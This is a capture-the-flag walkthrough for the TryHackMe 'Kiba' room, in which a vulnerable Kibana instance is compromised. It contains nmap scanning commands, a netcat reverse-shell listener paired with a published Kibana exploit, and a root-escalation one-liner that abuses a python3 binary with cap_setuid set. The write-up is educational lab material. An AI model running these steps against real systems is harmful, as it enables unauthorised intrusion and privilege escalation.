

This is a write-up for Kiba room from TryHackMe. It can be found here:-

Room Description: Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.

#1 What is the vulnerability that is specific to programming languages with prototype-based inheritance?

Check out the following link which describes this issue in details and will also give the answer:,lacks%20practical%20examples%20of%20exploitation.

#2 What is the version of visualization dashboard installed in the server?

Lets first enumerate the box using NMAP to find out all the open ports with the command:

sudo nmap -sS -Pn -T4 -p-

Lets find out what is ruuning on these open ports using the command:

sudo nmap -O -A -Pn -T4 -p22,80,5044,5601

The most interesting thing that comes out of this NMAP scan is kibana running on port 5601 which is open source data visualization dashboard for Elasticsearch.

Open this in a browser and look around and we will get the version which we are looking for.

#3 What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

Now we have the application name Kibana and a version, if we search we will find the CVE. The details can also be found Answer #1

#4 Compromise the machine and locate user.txt

Lets exploit the CVE and gets reverse shell. I have used an already published exploit available here:-

First open up a netcat listen from the attacking machine using:

nc -nlvp 9999

and run the exploit as 

python -u -host -port 9999 --shell

We will get the reverse shell and the user flag:

#5 Capabilities is a concept that provides a security system that allows "divide" root privileges into different values

Nice to know and no answer needed.

#6 How would you recursively list all of these capabilities?

Use :- getcap -r /

#7 Escalate privileges and obtain root.txt

Use the above command to find capabilities which can be abused and we will find:

python3 in /home/kiba/.hackmeplease directory have cap_setuid set which can be abused to get root privileges using:

/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

and the root flag at /root/root.txt:

Submit the flag and get the points :) See you next time.


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